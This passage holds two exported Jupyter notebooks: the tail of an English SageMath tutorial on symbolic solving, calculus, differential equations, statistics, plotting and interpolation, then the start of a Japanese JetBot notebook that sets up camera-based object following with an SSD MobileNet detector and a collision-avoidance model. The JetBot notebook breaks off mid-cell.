4)], [x == (-1/2*I + 1/2), y == sqrt(1/2*I + 4)], [x == (1/2*I + 1/2), y == -sqrt(-1/2*I + 4)], [x == (1/2*I + 1/2), y == sqrt(-1/2*I + 4)] ] ###Markdown When solving a system of equations (not inequalities), you can use the option `solution_dict=True` to have the solutions arranged as a *dictionary*, which is a type of Python collection that we did not treat in this course ###Code solve([x+y == 2, 2*x - y == 6], [x,y], solution_dict=True) ###Output _____no_output_____ ###Markdown Alternative method for real roots: `find_root()`The `solve()` method is very useful when solving *symbolic* equations, for example when you have two variables and you want to solve for one of them in terms of the other. However, it does not always find explicit solutions.When you want to find an explicit, even if approximate, solution, it can be better to use `find_root()`. This function works *numerically*, which means that it finds an approximation of the root. It only works for real solutions and you need to specify an interval where you want the root to be searched: ###Code f = e^x + x - 10 print("Using solve():\n", solve(f, x)) print("Using find_root():", f.find_root(0,10)) ###Output Using solve(): [ x == -e^x + 10 ] Using find_root(): 2.070579904980303 ###Markdown Evaluating functionsIf an expression contains only one variable you can evaluate it easily, even if it is not a function. ###Code var('y') f = x^2-3 g = x > x^2 print(f(2)) print(g(3+y)) ###Output 1 y + 3 > (y + 3)^2 ###Markdown If an expression contains more than one variable, you can specify a value for each of them and they will be substituted in alphabetic order. You can also specify a value only for some of the variables. ###Code var('y','z') f = y*z^2 - y == z print(f(2, 0)) print(f(z = 2)) ###Output -2 == 0 3*y == 2 ###Markdown Symbolic computationsSage can understand and simplify symbolic expressions such as sums (finite or infinite) and products. In the following cell, we compute the following sums using the [`sum()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.sum) function:\begin{align*} \begin{array}{llcc} (1) & \sum_{k=0}^nk &=&\frac{n^2+n}{2}\\ (2) & \sum_{k=0}^nk^4 &=&\frac{6n^5+15n^4+10n^3-n}{30}\\ (3) & \sum_{k=0}^n\binom nk &=& 2^n\\ (4) & \sum_{k=0}^\infty \frac1{k^2} &=& \frac{\pi^2}{6} \end{array}\end{align*}Recall that $\binom nk=\frac{n!}{k!(n-k)!}$ ###Code var('k', 'n') # Remember to declare all variables s = [] s.append( sum(k, k, 0, n) ) s.append( sum(k^4, k, 0, n) ) s.append( sum(binomial(n,k), k, 0, n) ) s.append( sum(1/k^2, k, 1, infinity) ) for i in range(len(s)): print("({}) {}".format(i+1, s[i])) ###Output (1) 1/2*n^2 + 1/2*n (2) 1/5*n^5 + 1/2*n^4 + 1/3*n^3 - 1/30*n (3) 2^n (4) 1/6*pi^2 ###Markdown An alternative notation is `expression.sum(k, a, b)`. There is an analogous [`prod()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.prod) for products. ###Code (x^2).prod(x, 1, n) ###Output _____no_output_____ ###Markdown Sometimes Sage tries to keep an expression in its original form without expanding out sums and products. To change this behavior you can use the [`expand()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.expand) function: ###Code f = (x+1)^2 - (x-1)^2 print(f) print(f.expand()) ###Output (x + 1)^2 - (x - 1)^2 4*x ###Markdown The Symbolic Ring**Reference:** [[3](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/ring.html)]The symbolic expressions that we have seen so far live in a ring called *symbolic ring* and denoted by `SR` in Sage. This ring works like the ring `ZZ` of integers or `RR` of reals numbers. In particular, you can define matrices and other objects using it as a "basis". ###Code var('a', 'b', 'c', 'd') M = matrix([[a,b], [c,d]]) print(M.determinant()) polring.<x> = SR[] f = x^2 + 2*a*x + a^2 print(f.roots()) ###Output -b*c + a*d [(-a, 2)] ###Markdown **Exercise.** Compute the eigenvalues of the matrix\begin{align*}\begin{pmatrix}\cos \alpha & \sin \alpha\\-\sin\alpha & \cos \alpha\end{pmatrix}\end{align*} ###Code var('a') M = matrix([[cos(a), sin(a)], [-sin(a), cos(a)]]) M.eigenvalues() lam = M.eigenvalues()[0] print(lam(pi/2)) ###Output -I ###Markdown Calculus**Reference:** [[4](https://doc.sagemath.org/html/en/reference/calculus/index.html)] for an overview, but most functions are described in [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)] Limits and series**References:** [[5](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/calculus.htmlsage.calculus.calculus.limit)] for limits, [[6](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.series)] for seriesYou can compute limits ###Code var('x') f = sin(x)/x #print(f(0)) # This one gives an error print( f.limit(x=0) ) print( (e^(-x)).limit(x=-infinity) ) ###Output 1 +Infinity ###Markdown **Exercise.** Compute the constant $e$ using a limit. ###Code expression = (1+x/n)^n expression.limit(n=infinity) ###Output _____no_output_____ ###Markdown You can also specify a direction for the limit. If you don't, Sage assumes that you want to take a two-sided limit. ###Code f = abs(x)/x # 1 if x>0, -1 if x<0 print( f.limit(x=0) ) # undefined print( f.limit(x=0, dir="+") ) print( f.limit(x=0, dir="-") ) plot(f) f = 1/x^2 print( f.limit(x=0) ) print( f.limit(x=0, dir="+") ) print( f.limit(x=0, dir="-") ) plot(f, (x, -10, 10), ymax = 10, ymin = -10) ###Output +Infinity +Infinity +Infinity ###Markdown There is also the alternative notation `limit(f, x, dir)` which does the same as `f.limit(x, dir)`. You can also compute series expansions up to any order. **Watch out:** the notation uses `==` instead of `=` as `limit()` does. ###Code f = e^x g = sin(x) - 2*cos(x) h = log(x) #print(f.series(x==0, 5)) #print(g.series(x==0, 7)) print(h.series(x==1, 4)) print((sin(x)^2*cos(x)).series(x==0, 6)) ###Output 1*(x - 1) + (-1/2)*(x - 1)^2 + 1/3*(x - 1)^3 + Order((x - 1)^4) 1*x^2 + (-5/6)*x^4 + Order(x^6) ###Markdown Derivatives**References:** [[7](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.derivative)] and [[8](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/functional.htmlsage.calculus.functional.derivative)] for derivatives, [[9](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/functions.htmlsage.calculus.functions.jacobian)] for the Jacobian matrix and [[10](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.hessian)] for the Hessian. When computing derivatives, you need to specify with respect to which variables you want to derive, except in case there is only one. ###Code var('y') print( (x^2+2*y^4).derivative(y) ) # Alternative: derivative(f, y) print( (2*x^3-x+2).derivative() ) ###Output 8*y^3 6*x^2 - 1 ###Markdown You can also compute higher order derivatives: ###Code print( (x^3).derivative(x, x) ) # Same as (x^3).derivative(x, 2) f = x^7*y^2 + x^4*y^2 - 2*x^3 + x^2*y^5 + y + 2 print( f.derivative(x, x, y) ) # Twice in x, once in y print( f.derivative(x, 4, y, 2) ) # 4 times in x, twice in y ###Output 6*x 84*x^5*y + 10*y^4 + 24*x^2*y 1680*x^3 + 48 ###Markdown Jacobian and Hessian matrices are also easy to compute: ###Code f = (-x^2 + 2*x*y, y^3, x+y+x*y) print( jacobian(f, [x,y]), "\n" ) g = x^2 + x*y + y^3 -2*x*y^2 -3 print( g.hessian() ) ###Output [-2*x + 2*y 2*x] [ 0 3*y^2] [ y + 1 x + 1] [ 2 -4*y + 1] [ -4*y + 1 -4*x + 6*y] ###Markdown *Note:* the notation `f.jacobian([x,y])` is also valid, but only if you specify that `f` is vector by declaring it as `f = vector([...])`. Integrals**References:** [[11](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/integration/integral.html)] for symbolic integration and [[12](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.html)] for numerical methods.You should remember from high school or from your first calculus/analysis course that derivatives are easy, but integrals are hard.When using a computer software to solve your integrals, you have two choices:1. You can try to compute a primitive function exactly, and then (if you are computing a definite integral) substitute the endpoints of your integration interval to get the result. We can call this *symbolic integration*.2. You can get an *approximated* result with a *numerical method*. This method always gives some kind of result, but it cannot be used to compute indefinite integrals.Sage can do both of these things, although people that work in numerical analysis and use often the second method tend to prefer other programs, such as Matlab (or its open-source clone Octave). Symbolic integrationSymbolic integrals work more or less like derivatives. You must specify an integration variable, but the endpoints of the integration interval are optional. If they are not given you get an indefinite integral. ###Code var('a', 'b') f = x + sin(x) print( f.integral(x) ) # Alternative: integral(f, x) print( f.integral(x, -10, 10) ) print( f.integral(x, 0, pi) ) ###Output 1/2*x^2 - cos(x) 0 1/2*pi^2 + 2 ###Markdown Your endpoints can also be $\pm\infty$: ###Code print( integral(e^(-x), x, 0, infinity) ) print( integral(e^(-x^2), x, -infinity, infinity) ) ###Output 1 sqrt(pi) ###Markdown The last function is also an example of an integral that perhaps you might want to compute numerically. In fact: ###Code print( integral(e^(-x^2), x) ) print( integral(e^(-x^2), x, 1, 2) ) ###Output 1/2*sqrt(pi)*erf(x) 1/2*sqrt(pi)*erf(2) - 1/2*sqrt(pi)*erf(1) ###Markdown Here `erf(x)` denotes the [error function](https://en.wikipedia.org/wiki/Error_function). Numerical integrationIn order to get an explicit value for the computations above, we can use a *numerical* method.The word "numerical" does not have much to do with numbers, but it refers to the fact that we are trying to compute explicit results rather than symbolic or algebraic ones. [Numerical analysis](https://en.wikipedia.org/wiki/Numerical_analysis) is the branch of mathematics that studies methods to approximate computations over the real or complex numbers. With these methods there is usually a trade-off between speed and precision.The Sage function [`numerical_integral()`](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.htmlsage.calculus.integration.numerical_integral) takes as a parameter a real-valued one-variable function and the integration endpoints, and it returns both an approximate value for the integral and an error estimate. ###Code numerical_integral(e^(-x^2), 1, 2) ###Output _____no_output_____ ###Markdown The result above means, in symbols\begin{align*}\int_1^2 e^{-x^2}\mathrm dx = 0.13525725794999466 \pm 1.5016572202374808\times 10^{-15}\end{align*}There is also a [`monte_carlo_integral()`](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.htmlsage.calculus.integration.monte_carlo_integral) method for functions with more than one variable. **Exercise.** Compute the area of the ellipse of equation $y^2+\left(\frac x3\right)^2=1$. **Solution:** First, rewrite the equation as:\begin{align*}y = \sqrt{1- \left(\frac{x}{3}\right)^2}\end{align*} ###Code y = sqrt(1-(x/3)^2) show(plot(y, xmin=-3.1, xmax=3.1, ymin=-0.2, ymax=1.1)) integral(y, x, -3, 3) ###Output _____no_output_____ ###Markdown Differential equations**Reference:** [[13](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/desolvers.html)]A [differential equation](https://en.wikipedia.org/wiki/Differential_equation) is an equation involving an unknwon function and its derivatives. They can be of two kinds: *ordinary* differential equations ([ODE](https://en.wikipedia.org/wiki/Ordinary_differential_equation)) and *partial* differential equations ([PDE](https://en.wikipedia.org/wiki/Partial_differential_equation)). The latter involve multivariate functions and their partial derivatives.Differential equations are in general hard to solve *exactly* (or *symbolically*): even a simple equation of the form $f'(x)=g(x)$, where $g(x)$ is someknown function, requires solving the integral $\int g(x)\mathrm{d}x$ in order to find $f$, which as we know is not always easy!Theoretical results on differential equations usually ensure the existence and/or uniquess of a solution under certain conditions, but in general they do not give a way to solve them. There exits many methods to find approximate solutions, and some of them are implemented in Sage as well (see [[13](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/desolvers.html)]). However we will focus on the simple ODEs that can be solved exactly.Let's start with a simple example. Let's find all functions $f(x)$ such that $f'(x)=f(x)$. In order to do so, we need to use the `function()` construct, which allows us to define an "unknwon" function inside Sage, like we define variables with `var()`. ###Code var('x') function('f') equation = derivative(f(x)) == f(x) desolve(equation, f(x)) # f(x) is the unknown function ###Output _____no_output_____ ###Markdown As you can expect, they are all the functions $Ce^x$ for some constant $C$. The constant $C$ plays the same role as the constant in the solution of an integral, but in this case Sage writes it explicitly.We can also specify *initial conditions* for our function. For example we can impose that $f(0)=3$ as follows: ###Code desolve(equation, f(x), (0,3)) ###Output _____no_output_____ ###Markdown You can also solve *second order* equations, that is equations where the second derivative also appears. In this case if you want to specify an initial condition you should write the triple of values $(x_0, f(x_0), f'(x_0))$. ###Code equation = derivative(f(x), x, 2) + x*derivative(f(x)) == 1 desolve(equation, f(x), (0, 0, 0)) ###Output _____no_output_____ ###Markdown **Exercise.** Use Sage to find out the functions $f(x)$ that satisfy\begin{align*} \begin{array}{rlcrl} (A) & \begin{cases} f(0) &= 1\\ f'(0) &= 0\\ f''(x) &= -f(x) \end{cases} & \qquad \qquad & (B) & \begin{cases} f(0) &= 0\\ f'(0) &= 1\\ f''(x) &= -f(x) \end{cases} \end{array}\end{align*} ###Code eq = derivative(f(x), x, 2) == -f(x) conditions1 = (0,1,0) conditions2 = (0,0,1) print( desolve(eq, f(x), conditions1) ) print( desolve(eq, f(x), conditions2) ) print( desolve(eq, f(x)) ) ###Output cos(x) sin(x) _K2*cos(x) + _K1*sin(x) ###Markdown A real-world exampleDifferential equations have countless applications in Science, so it would be a shame not to see at least a simple one.Consider an object moving with constant acceleration $a$. Its velocity at time $t$ is described by the formula $v(t) = v(0) + at$. For example an object falling from the sky has acceleration $g\sim 9.8 m/s^2$ towards the ground, so its velocity is $v(t) = -gt$.However in the real world you need to take into account the air's resistance, which depends (among other things) on the velocity of the object. In this case the acceleration $a(t)$ is not constant anymore, and it satisfies an equation of the form $a(t)=-g -kv(t)$, where $k$ is some constant that may depend on the shape and mass of the object (in practice it may be more complicated than this).Since the acceleration is the derivative of the velocity, we have a differential equation\begin{align*} v'(t) = -g -kv(t)\end{align*}and we can try to solve it with Sage! ###Code var('t') function('v') g = 9.8 k = 1.5 conditions = (0, 0) # Start with velocity 0 sol = desolve(derivative(v(t)) == -g -k*v(t), v(t), conditions) #plot(sol, xmin=0, xmax = 100) ###Output _____no_output_____ ###Markdown If you want to solve this equation symbolically (that is, keeping $g$ and $k$ in symbols) you need to specify that $t$ is the *independent variable* of the equation: ###Code var('t', 'g', 'k') function('v') conditions = (0, 0) # Start with velocity 0 desolve(derivative(v(t)) == -g -k*v(t), v(t), conditions, ivar=t) ###Output _____no_output_____ ###Markdown Basic data analysis and visualization Statistics**References:** [[14](https://doc.sagemath.org/html/en/reference/stats/sage/stats/basic_stats.html)]Sage includes the most basic functions for statistical analysis. ###Code L = [1, 2, 3, 3, -6, -2, 4, -1, 0, 2, 3, -4, 0] print("Values:\t", L) print("Mean:\t\t\t", mean(L)) print("Median:\t\t\t", median(L)) print("Mode:\t\t\t", mode(L)) print("Standard deviation:\t", std(L)) print("Variance:\t\t", variance(L)) print("Moving average (5):", moving_average(L,5)) ###Output Values: [1, 2, 3, 3, -6, -2, 4, -1, 0, 2, 3, -4, 0] Mean: 5/13 Median: 1 Mode: [3] Standard deviation: 2*sqrt(29/13) Variance: 116/13 Moving average (5): [3/5, 0, 2/5, -2/5, -1, 3/5, 8/5, 0, 1/5] ###Markdown You can also compare your data to a probability distribution, see [this page](https://doc.sagemath.org/html/en/reference/probability/sage/probability/probability_distribution.html). If you need to do more advanced statistics you should consider using [R](https://www.r-project.org/); you can also use it inside Sage. Plotting**Reference:** [[15](https://doc.sagemath.org/html/en/reference/plotting/index.html)], more specifically the subsection [[16](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/plot.html)].Some Sage objects can be plotted: ###Code f = sin(x) plot(f) ###Output _____no_output_____ ###Markdown Sage's plotting functions are based on Python's [matplotlib](https://matplotlib.org/).You can give a number of options to adjust the aspect of your plot, see [here](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/plot.htmlsage.plot.plot.plot). Let's see some of them: ###Code f = sin(x) p = plot(f, -2*pi, 2*pi, # bounds for x ymin = -1.1, ymax = 1.1, # bounds for y color = "red", title = "The sin function", ) print("hello") show(p) ###Output hello ###Markdown Some of the options are not described precisely in Sage's documentation, but you can find them on [matplotlib's documentation](https://matplotlib.org/stable/contents.html). You can find many examples online for adjusting your plot as you like! If you need to plot more than one object at the time, you can sum two plots and show them together with `show()`: ###Code cosine = plot(cos(x), (x,-pi/2,pi/2), color="red") exponential = plot(exp(x), (x,-2,0.5)) show(cosine + exponential) # works like print() ###Output _____no_output_____ ###Markdown Finally, there are other types of plots that you can use, like [scatter plots](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/scatter_plot.htmlsage.plot.scatter_plot.scatter_plot) and [bar charts](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/bar_chart.htmlsage.plot.bar_chart.bar_chart). You can also add [text](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/text.htmlsage.plot.text.text) to your plot: ###Code b = bar_chart(range(1,10)) s = scatter_plot([(1,5), (4,2), (8,8), (4,7)], marker = "*", # symbol markersize = 100, edgecolor = "green", facecolor = "red" ) t = text("wow, such plot!", (1, 8), color="black", fontsize=20) show(b + s + t) ###Output _____no_output_____ ###Markdown Interpolation**References:** [[17](https://doc.sagemath.org/html/en/reference/polynomial_rings/sage/rings/polynomial/polynomial_ring.htmlsage.rings.polynomial.polynomial_ring.PolynomialRing_field.lagrange_polynomial)] and [[18](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/interpolation.html)].When you need to work with a discrete set of data, like measurements of real-world quantities, it can be useful to visualize a "smoothed out" version of this data, for example by plotting a function that approximates it.One way to do so is finding the lowest-degree polynomial that passes through all your points. This is called [Lagrange Polynomial](https://en.wikipedia.org/wiki/Lagrange_polynomial). ###Code points = [ (0,1), (1,2), (1.5,0), (2,4), (3,5) ] polring.<x> = QQ[] # you need to specify a polynomial ring lp = polring.lagrange_polynomial(points) show(scatter_plot(points, facecolor="red") + plot(lp, 0, 3) # slightly different notation for polynomials + text(lp, (1,8), color="black") ) ###Output _____no_output_____ ###Markdown One can compute the Lagrange Polynomial over any base ring, and it has the advantage that it is a very "nice" function (continuous and differentiable as much as you like, with easily computable derivatives and primitives).However, it does not always give you good approximation of your data: ###Code R = [x/10 for x in range(-10,10)] L = [1/(1+25*x^2) for x in R] points = [(R[i], L[i]) for i in range(len(L))] polring.<x> = RR[] lp = polring.lagrange_polynomial(points) show(plot(lp, -0.92, 0.82) + scatter_plot(points)) ###Output _____no_output_____ ###Markdown This particular example is called [Runge's phenomenon](https://en.wikipedia.org/wiki/Runge%27s_phenomenon). For a better approximation you can use a [spline](https://en.wikipedia.org/wiki/Spline_(mathematics)), which is a *piecewise* polynomial function: ###Code show(plot(spline(points), -1, 1) + scatter_plot(points)) ###Output _____no_output_____
notebooks/object_following/01_live_demo.ipynb
###Markdown Object Following - 物体追跡このノートブックでは、JetBotで物体を追跡する方法を示します。 collision avoidanceをベースに、「free(直進する)」時に物体を追跡します。 物体検出に使うモデルは一般的な90種類のオブジェクトの画像を分類した[COCOデータセット](http://cocodataset.org)を事前にトレーニングしたssd_mobilenet_v2モデルを利用します。 このモデルはTensorRTに変換したものを使用しますが、JetPackバージョンによってTensorRTのバージョンが異なるため、変換時のTensorRTバージョンと同一の実行環境である必要があります。追跡可能な物体はCOCOデータセットで学習している物体となります。* 人(インデックス1)* カップ(インデックス47)その他多数あります(クラスインデックスの完全なリストについては、[ラベルファイル](https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_complete_label_map.pbtxt)で確認できます)。 インデックス0はbackgroundになります。通常、分類・検出するモデルでは「未検出」という状態を持つためにbackgroundラベルが使われています。 学習済みモデルは[Tensorflow Object Detection API](https://github.com/tensorflow/models/tree/master/research/object_detection)で公開されているものをベースに予めTensorRT化してあるものを使います。``Tensorflow Object Detection API``を使って自前のデータをデスクトップPCやクラウドサーバーで学習することも出来ます。ssd_mobilenet_v2_cocoをTensorRTに変換することにより、物体検出モデルの実行が非常に高速になり、Jetson Nanoでリアルタイムに実行できるようになります。ただし、このノートブックではCOCOデータセットからのトレーニングや他の最適化に関する手順は実行しません。また、TensorRTはバージョンによりAPIが頻繁に変更されているため、他のJetPackバージョンで動作していたssd_mobilenet_v2_coco.engineは利用できません。> このノートブックはJetson Nano 4GB JetPack 4.3で作られたJetBotで動作します。 > Jetson Nano 2GB (JetPack 4.4以降)とJetson Nano 4GB JetPack 4.4以降では動作確認していません。まずは始めてみましょう。 カメラの準備カメラを初期化しましょう。物体検出モデルは300x300ピクセルの画像を入力とするため、カメラ解像度を300x300に設定します。> 内部的には、CameraクラスはGStreamerを使用してJetson Nanoのイメージシグナルプロセッサ(ISP)を利用しています。これはCPUでリサイズ処理を実行する場合とは比較にならないほど超高速です。 ###Code ######################################## # 利用するライブラリを読み込みます。 ######################################## from jetbot import Camera # JetBot用に用意したカメラライブラリを利用します。 ######################################## # カメラを有効化します。 # 画像はwidthとheightで指定したピクセルサイズにリサイズされます。 # ssd_mobilenet_v2_cocoは300x300の入力層のため、カメラ画像は300x300にリサイズします。 # fpsのデフォルトは21ですが、カメラフレーム更新に連動して推論を実行するようにコーディングしているため、 # 処理が重くなってしまいます。そのためfpsを小さく設定します。 ######################################## camera = Camera(width=300, height=300, fps=5) ###Output _____no_output_____ ###Markdown 事前トレーニング済みのSSDエンジンを使用する[ObjectDetector](https://github.com/NVIDIA-AI-IOT/jetbot/blob/master/jetbot/object_detection.py)クラスをインポートして、``ssd_mobilenet_v2_coco.engine``をロードします。Jetpack4.3向けの[ssd_monbilenet_v2_coco.engine](https://drive.google.com/file/d/1KjlDMRD8uhgQmQK-nC2CZGHFTbq4qQQH/view) をダウンロードし、JupyterLabの本Notebookと同じフォルダに``ssd_monbilenet_v2_coco.engine``をアップロードします。 SSD MobileNet V2モデルを読み込む ###Code ######################################## # 利用するライブラリを読み込みます。 ######################################## from jetbot import ObjectDetector # JetBot用に用意した物体検出ライブラリを利用します。 ######################################## # TensorRTの物体検出モデルを読み込みます。 ######################################## model = ObjectDetector('ssd_mobilenet_v2_coco.engine') ###Output _____no_output_____ ###Markdown 内部的には、``ObjectDetector``クラスはTensorRT Python APIを使用してモデルを実行します。また、モデルへの入力の前処理や、検出されたオブジェクトの解析も行います。 現時点では、``jetbot.ssd_tensorrt``パッケージを使用して作成されたモデルでのみ機能します。このパッケージには、モデルをTensorflowオブジェクト検出APIから最適化されたTensorRTエンジンに変換するためのユーティリティが含まれています。 次に、カメラ入力を使用してネットワークを実行してみましょう。 デフォルトでは ``ObjectDetector``クラスはカメラが生成する``bgr8``フォーマットを期待しています。 しかし、別のフォーマットを入力に使う場合は、デフォルトの前処理関数をオーバーライドして変更できます。 ###Code ######################################## # 利用するライブラリを読み込みます。 ######################################## import cv2 ######################################## # 物体検出はTensorflowで学習されたモデルを使っています。このモデルは学習時にRGB画像フォーマットで学習されています。 # そのモデルをTensorRTモデルに変換したものがssd_mobilenet_v2_coco.engineです。 # 物体検出モデルの入力データはRGBフォーマットに変換する方が精度がよくなりますが、 # BGR->RGB変換をObjectDetectorクラスが実行しているため、 # このノートブックにおける物体検出の入力データはOpenCVカメラ画像のBGRフォーマットのまま渡すことになります。 ######################################## detections = model(camera.value) print(detections) # 推論結果を表示します。 ###Output _____no_output_____ ###Markdown カメラ画像にCOCOオブジェクトがある場合、その情報は``detections``変数に格納されています。 テキスト領域に検出を表示する次のコードを使用して、検出されたオブジェクトの情報をテキストエリアに表示します。 ###Code ######################################## # 利用するライブラリを読み込みます。 ######################################## from IPython.display import display import ipywidgets.widgets as widgets detections_widget = widgets.Textarea() # テキストウィジェットを作成します。 detections_widget.value = str(detections) # テキストウィジェットに検出したオブジェクトの情報を反映します。 display(detections_widget) # テキストウィジェットを表示します。 ###Output _____no_output_____ ###Markdown カメラ画像で検出された各オブジェクトのラベルID、信頼度、境界ボックスの座標が表示されます。ミニバッチ学習時に複数の画像を一度に学習したなごりで、予測時にも一度に複数の画像を入力として期待するモデルに仕上がっています。 今回は1台のカメラしか使わないため、モデルの入力には1枚の画像を持つ配列が使われています。 最初の画像で検出された最初のオブジェクトのみを表示するには、次のように呼び出すことができます。> オブジェクトが検出されない場合、エラーになるため、try-exceptでエラーハンドリングします ###Code image_number = 0 # 推論時に配列で与えた最初の画像を表す配列のインデックス番号。推論時は1枚の画像しか与えていないため、0固定値。 object_number = 0 # 検出した物体の情報を持つ配列から、取り出したい配列のインデックス番号。複数の物体が検出された場合は0以外もあり得る。検出しなかった場合、配列は存在しない。 try: print(detections[image_number][object_number]) except: print("object not found") ###Output _____no_output_____ ###Markdown 中心物体を追跡するようにロボットを制御する次に、ロボットに指定されたクラスのオブジェクトを追跡させます。 これを行うには、次のようにします1. 指定したクラスに一致するオブジェクトを検出します。[ラベルファイル](https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_complete_label_map.pbtxt)でラベルIDと対応する物体を確認してください。2. カメラの視野の中心に最も近いオブジェクトを選択します。これが指定したオブジェクトの時に追跡するターゲットになります。3. ロボットをターゲットオブジェクトに向けます。4. collision avoidanceをベース動作にしているため、障害物によってブロックされていると判断した場合は、左折します。> ラベルファイルにはいくつかバージョンがあります。Tensorflowのラベルは80オブジェクト分になります。 そのため、いくつか名前のないラベルが含まれています。[cocoデータセットのラベルについて](https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/)また、ターゲットオブジェクトのラベル、ロボットの速度を制御するために使用するいくつかのウィジェットを作成します。`turn gain`は、ターゲットオブジェクトとロボットの視野の中心との間の距離に基づいてロボットが回転する速度を制御します。まず、衝突回避モデルをロードします。衝突回避の例に従って、実際の環境でうまく動作するモデルを使用することをお勧めします。 ###Code ######################################## # 利用するライブラリを読み込みます。 ######################################## import torch import torchvision import torch.nn.functional as F import cv2 import numpy as np ######################################## # 衝突回避モデルを読み込みます。 ######################################## collision_model = torchvision.models.alexnet(pretrained=False) collision_model.classifier[6] = torch.nn.Linear(collision_model.classifier[6].in_features, 2) collision_model.load_state_dict(torch.load('../collision_avoidance/best_model.pth')) ######################################## # GPU処理が可能な部分をGPUで処理するように設定します。 # モデルを評価モードにします。 # モデルをfloat16型に変換します。 ######################################## device = torch.device('cuda') collision_model = collision_model.to(device) collision_model = collision_model.eval().half() ######################################## # この値はpytorch ImageNetの学習に使われた正規化(ImageNetデータセットのRGB毎に平均を0、標準偏差が1になるようにスケーリングすること)のパラメータです。 # カメラ画像はこの値でRGBを正規化することが望ましいでしょう。 # ここではtransforms.ToTensor()を使っていないため、正規化前のRGB値の範囲は[0, 255]です。 # そこで、学習時のRGB各範囲と同じ範囲にスケーリングするように正規化パラメータに255.0を掛けて設定します。 ######################################## mean = 255.0 * np.array([0.485, 0.456, 0.406]) stdev = 255.0 * np.array([0.229, 0.224, 0.225]) ######################################## # 正規化する関数を定義します。 # torchvision.transforms.Normalizeクラスはインスタンス化すると # torch.nn.functional.normalize関数を返します。 # ソースコード: # https://pytorch.org/docs/stable/_modules/torchvision/transforms/transforms.html#Normalize # https://pytorch.org/docs/stable/_modules/torch/nn/functional.html#normalize ######################################### normalize = torchvision.transforms.Normalize(mean, stdev) ######################################## # カメラ画像をモデル入力用データに変換します。 ######################################## def preprocess(camera_value): # OpenCVで取得したカメラ画像を変数xにコピーします。 x = camera_value # 画像解像度を300x300から224x224に変更します。 x = cv2.resize(x, (224, 224)) # 学習時の画像データはtorchvision.datasets.ImageFolderを使って読み込んでいるため、モデルはRGBフォーマットの画像で学習しています。 # カメラ映像はOpenCVで読み込んでいるため画像はBGRフォーマットになっています。これをRGBフォーマットに変換します。 x = cv2.cvtColor(x, cv2.COLOR_BGR2RGB) # 画像フォーマットをHWCからCHWに変換します。 x = x.transpose((2, 0, 1)) # float32に変換します。 x = torch.from_numpy(x).float() # 正規化します。 x = normalize(x) # GPUデバイスを利用します。float16に変換します。 x = x.to(device).half() # バッチ配列に変換します。 x = x[None, ...] # 入力用データxを返します。 return x ###Output _____no_output_____ ###Markdown モーターを制御するためにrobotインスタンスを生成します。 ###Code ######################################## # 利用するライブラリを読み込みます。 ######################################## from jetbot import Robot # JetBotを制御するためのライブラリを利用します。 ######################################## # JetBotの制御用クラスをインスタンス化します。 ######################################## robot = Robot() ###Output _____no_output_____ ###Markdown コントロールウィジェットとカメラ更新とモデル実行の関数を作成します。 ###Code ######################################## # 利用するライブラリを読み込みます。 ######################################## from jetbot import bgr8_to_jpeg # JetBot用に用意した画像変換ライブラリを利用します。 ######################################## # 「blocked」の確率を表示するためのスライダーを用意します。 ######################################## blocked_widget = widgets.FloatSlider(min=0.0, max=1.0, value=0.0, description='blocked') ######################################## # 画像表示用のウィジェットを用意します。 # widthとheightは表示するウィジェットの幅と高さです。 # カメラ画像サイズと一致する必要はありません。 ######################################## image_widget = widgets.Image(format='jpeg', width=300, height=300) ######################################## # 追跡対象のラベル名を選択するためのウィジェットを作成します。 # ラベル名は学習済みモデルssd_mobilenet_v2_coco.engineが持つラベル名になります。 # 追跡対象はpersonとしておきます。 ######################################## label_widget = widgets.Dropdown( options=['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light', 'fire hydrant', '12', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', '26', 'backpack', 'umbrella', '29', '30', 'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard', 'tennis racket', 'bottle', '45', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed', '66', 'dining table', '68', '69', 'toilet', '71', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', '83', 'book', 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush'], value='person', description='tracked label', disabled=False ) ######################################## # JetBotの動作を調整するためのスライダーウィジェットを用意します。 ######################################## speed_widget = 